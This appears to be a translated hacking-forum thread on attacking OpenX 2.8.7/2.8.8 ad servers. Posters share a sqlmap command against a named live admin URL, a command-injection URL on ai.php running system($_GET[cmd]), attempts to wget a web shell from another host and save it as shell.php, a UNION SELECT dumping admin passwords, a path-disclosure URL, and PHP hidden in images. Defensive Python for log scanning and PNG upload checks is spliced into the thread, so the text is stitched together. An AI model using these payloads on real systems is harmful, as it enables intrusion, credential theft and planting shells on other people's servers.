openx 2.8.7 exploit

openx 2.8.7
No idea how useful this is, I found it yesterday, but it's at least something: an SQL injection in the admin panel. Blind as a mole.
http://test.com/www/admin/updates-history.php
POST_data:
P.S. Read through the MySQL manuals a bit; the SQL injection is not blind, there is output.
sqlmap -u "http://admin.oads.vimg.net/www/admin/updates-history.php" --method "POST" --data "btn_clean_audit=Delete+Artifacts&upgrade_action_id=7" --dbs
[04:44:20] [INFO] testing connection to the target url
[04:44:21] [INFO] testing if the url is stable, wait a few seconds
[04:44:24] [INFO] url is stable
[04:44:24] [INFO] testing if POST parameter 'btn_clean_audit' is dynamic
[04:44:25] [WARNING] POST parameter 'btn_clean_audit' is not dynamic
[04:44:25] [INFO] testing if POST parameter 'upgrade_action_id' is dynamic
[04:44:25] [WARNING] POST parameter 'upgrade_action_id' is not dynamic
[04:44:25] [INFO] testing if Cookie parameter 'sessionID' is dynamic
[04:44:26] [WARNING] Cookie parameter 'sessionID' is not dynamic
[04:44:26] [INFO] testing if Cookie parameter 'OAGEO' is dynamic
[04:44:27] [WARNING] Cookie parameter 'OAGEO' is not dynamic
[04:44:27] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[04:44:27] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[*] shutting down at: 04:44:27
doesn't work
Help me with uploading a shell. I found this vulnerability.
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=ls -la
executes
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=whereis wget
executes
Code:
http://site.ru/oads/www/delivery/ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg&cmd=wget http://site2.ru/shell.txt
does not execute
I tried fetch and curl the same way, and it won't upload. I also tried giving the site2.ru address without http, tried encoding it in ASCII, in base64, and so on. How do I upload a shell?
Maybe there is no write permission there? Or try:
wget http://sait.ru/shell.txt -O /home/polniu put' do papki/shell.php
The path is easy to find out with pwd
Path disclosure, tested on OpenX 2.8.7, 2.8.8
Exploit:
Code:
http://openx/www/delivery/dxmlrpc.php
P.S. It helped me out today
sql injection
Code:
http://site.ru/www/delivery/ac.php?bannerid=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_w s(0x3a,p.admin,p.admin_pw),19,20,21,22,23,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38 from ox_preference p, ox_banners d, ox_campaigns c WHERE p.agencyid=0
openx version 2.4.4
This vulnerability does not work. I tried it on other sites and other versions (2.6.0). Please tell me how to use it correctly.
Maybe the prefixes are different, or the tables are old! Just work it as an ordinary injection, not by this template! If that doesn't help, post the link.
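For anyone running OpenX, the two delivery-script requests quoted in the posts above have a shape that is easy to spot in web-server access logs: `filename` on `ai.php` and `bannerid` on `ac.php` carry values that are not a plain file name or an integer. The following is an added example, not code from the thread or from OpenX; the allowed-value patterns, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Allowed value shapes per delivery script and parameter. These patterns are
# assumptions for this example; tune them to the values your banners really use.
RULES = {
    "ai.php": {"filename": re.compile(r"[A-Za-z0-9._-]{1,128}")},
    "ac.php": {"bannerid": re.compile(r"\d{1,10}")},
}

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')

# Constructed sample log lines (documentation IP range, made-up timestamps).
# Lines 2 and 4 reuse the request shapes quoted in the thread.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [10/Oct/2012:04:40:01 +0000] "GET /oads/www/delivery/'
    'ai.php?filename=banner_01.jpg&contenttype=jpeg HTTP/1.1" 200 5120',
    '203.0.113.9 - - [10/Oct/2012:04:45:02 +0000] "GET /oads/www/delivery/'
    'ai.php?filename=111.jpg%27;system%28$_GET[cmd]%29;/*&contenttype=111.jpg'
    '&cmd=ls%20-la HTTP/1.1" 200 312',
    '203.0.113.5 - - [10/Oct/2012:04:46:10 +0000] "GET /www/delivery/'
    'ac.php?bannerid=42 HTTP/1.1" 200 43',
    '203.0.113.9 - - [10/Oct/2012:04:47:33 +0000] "GET /www/delivery/'
    'ac.php?bannerid=-1%20union%20select%201,2,3 HTTP/1.1" 200 43',
])


def query_params(query):
    """Split on '&' only and URL-decode once, keeping repeated parameters.

    Decoding once is enough here: a double-encoded value still contains '%',
    which the allow-list patterns above reject.
    """
    params = {}
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def scan(log_text):
    """Return (line_no, script, parameter, decoded_value) for every delivery
    request whose checked parameter does not match its allowed shape."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        path, _, query = match.group("target").partition("?")
        if "/delivery/" not in path:
            continue
        script = path.rsplit("/", 1)[-1]
        rules = RULES.get(script)
        if not rules:
            continue
        params = query_params(query)
        for name, pattern in rules.items():
            for value in params.get(name, []):
                if not pattern.fullmatch(value):
                    findings.append((line_no, script, name, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allow-list patterns can be enforced in front of the application (web-server rewrite rule or WAF) so that non-conforming requests never reach the delivery scripts.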
OpenX 2.8.8 Path disclosure (300):
Another 200
Relevant in all versions of OpenX. Uploading PHP code inside an image. The only checks on the file are size, resolution, header and extension.
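The checks listed in the post above (size, resolution, header, extension) all pass for an image that carries extra bytes in a metadata chunk or after the end of the image data. The following is an added example, not OpenX code, of a stricter upload check narrowed to PNG: it walks the chunk structure, verifies every CRC, and rejects script markers in non-pixel chunks and any bytes after `IEND`. The marker list, the size limit and the sample files are assumptions constructed for the example.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Byte sequences that have no business in image metadata (assumed list).
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")


def _chunk(ctype, data):
    """Serialize one PNG chunk: length, type, data, CRC over type+data."""
    body = ctype + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body))


def build_sample_png(extra_chunks=(), trailer=b""):
    """Constructed 1x1 grayscale PNG used as sample input for the checks."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    out = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    for ctype, data in extra_chunks:
        out += _chunk(ctype, data)
    return out + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"") + trailer


def inspect_png(blob, max_dim=4096):
    """Return a list of problems; an empty list means the upload passed."""
    if not blob.startswith(PNG_SIGNATURE):
        return ["not a PNG: bad signature"]
    problems = []
    pos = len(PNG_SIGNATURE)
    first, seen_iend = True, False
    while pos < len(blob):
        if len(blob) - pos < 12:
            problems.append("truncated chunk header")
            break
        (length,) = struct.unpack(">I", blob[pos:pos + 4])
        ctype = blob[pos + 4:pos + 8]
        end = pos + 8 + length
        if end + 4 > len(blob):
            problems.append("chunk length overruns the file")
            break
        data = blob[pos + 8:end]
        (crc,) = struct.unpack(">I", blob[end:end + 4])
        name = ctype.decode("latin-1")
        if zlib.crc32(ctype + data) != crc:
            problems.append(f"{name} chunk has a bad CRC")
        if first and ctype != b"IHDR":
            problems.append("first chunk is not IHDR")
        if ctype == b"IHDR" and length == 13:
            width, height = struct.unpack(">II", data[:8])
            if not (0 < width <= max_dim and 0 < height <= max_dim):
                problems.append(f"dimensions {width}x{height} out of range")
        # IDAT holds compressed pixel data and is skipped to avoid random
        # false positives, so this scan covers metadata chunks only.
        if ctype != b"IDAT":
            lowered = data.lower()
            hit = next((m for m in SCRIPT_MARKERS if m in lowered), None)
            if hit:
                problems.append(f"{name} chunk contains script marker {hit!r}")
        first = False
        pos = end + 4
        if ctype == b"IEND":
            seen_iend = True
            break
    if seen_iend and pos < len(blob):
        problems.append(f"{len(blob) - pos} bytes after IEND")
    if not seen_iend:
        problems.append("no IEND chunk")
    return problems


if __name__ == "__main__":
    comment = (b"tEXt", b"Comment\x00<?php /* constructed marker */ ?>")
    print(inspect_png(build_sample_png()))
    print(inspect_png(build_sample_png(extra_chunks=[comment])))
    print(inspect_png(build_sample_png(trailer=b"\n<?php ?>")))
```

Content checks like this narrow the gap, but the durable control is to store uploads under a server-generated name in a directory where the PHP handler is disabled.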